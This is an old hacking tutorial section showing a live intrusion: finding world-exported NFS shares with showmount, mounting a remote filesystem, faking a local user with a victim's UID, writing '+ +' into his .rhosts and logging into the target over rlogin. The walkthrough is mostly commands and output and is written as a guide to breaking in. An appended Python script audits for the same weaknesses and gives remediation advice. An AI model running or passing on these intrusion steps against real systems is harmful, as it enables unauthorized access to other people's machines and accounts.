Mount the drives
Ok, now on to mounting the drives ....
Let's say we did a showmount -e domain.com and got back:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
We would want to mount / .. yup .... this guy has his entire system mountable!
$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount
If he had the home directory mountable the command would be:
$root> mount -nt nfs domain.com:/home /tmp/mount
To unmount the system, make sure you are out of the directory and type:
$root> umount /tmp/mount
Make sure you make the mount directory first; you can make it anywhere on the
system that you want. If the system's /mnt directory is empty, you can use it
also.
Ok this is for real:
bash# ls -al /mnt ; making sure the mnt dir is empty
ls: /mnt: No such file or directory ; there was not even a dir there ;)
bash# mkdir /mnt ; let's make one for them
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...
bash# cd /mnt ; changing to the mounted drive...
bash# ls ; just the plain dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost+found radius-961029.ps
bash# ; there it is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; notice tom is user number 302 ... hmmm let's put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; this should do it ;)
bash# su - tom ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; NOTICE above that tom's user number is gone ... we now own his dir!
bash$ echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts
bash$ ; inside .rhosts will be wild cards + + for anyone to rlogin to his account
bash$ rlogin xxxxx.xxx ; we are tom on our machine, so let's just rlogin plain.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> ; yup we are in!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .proofile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhoosts
>
So now we have access, so let's just hack this system ... oops, that is another
lesson! Have pun!
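
The two weaknesses this walkthrough depends on, seen from the administrator's side, as an added example that is not part of the original post: it parses showmount -e output for exports any host may mount and scans .rhosts content for + wildcards. The sample inputs, function names and severity labels are constructed for illustration; treating an export with no client list as unrestricted is an assumption.

```python
# Added audit example (not from the original post). Sample inputs are constructed.
SAMPLE_SHOWMOUNT = """\
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
"""
SAMPLE_RHOSTS = "+ +\ntrusted.example.org tom\n"

# Solaris prints "(everyone)", Linux prints "*" for an unrestricted export.
WORLD_MARKERS = {"(everyone)", "*"}


def parse_exports(text):
    """Return [(path, [clients])] parsed from `showmount -e` output."""
    exports = []
    for line in text.splitlines():
        parts = line.split(None, 1)
        if not parts or not parts[0].startswith("/"):
            continue  # header line ("Export list for ...") or blank
        clients = parts[1].strip().split(",") if len(parts) > 1 else []
        exports.append((parts[0], [c.strip() for c in clients]))
    return exports


def world_exports(text):
    """Return [(path, severity)] for exports that any host may mount."""
    findings = []
    for path, clients in parse_exports(text):
        # Assumption: an export with no client list is treated as unrestricted.
        if not clients or any(c in WORLD_MARKERS for c in clients):
            # Heuristic: "/" or a home tree exposes dot-files such as .rhosts.
            critical = path == "/" or "home" in path.split("/")
            findings.append((path, "critical" if critical else "high"))
    return findings


def rhosts_wildcards(text):
    """Return .rhosts lines whose host or user field is the '+' wildcard."""
    bad = []
    for line in text.splitlines():
        fields = line.split()
        if fields and "+" in fields[:2]:
            bad.append(line.strip())
    return bad


if __name__ == "__main__":
    for path, severity in world_exports(SAMPLE_SHOWMOUNT):
        print(f"{severity:8} {path} is mountable by any host")
    for entry in rhosts_wildcards(SAMPLE_RHOSTS):
        print(f"critical .rhosts entry trusts everyone: {entry!r}")
```

Any export it reports should be restricted to named client hosts in the server's export configuration, and any reported .rhosts line removed.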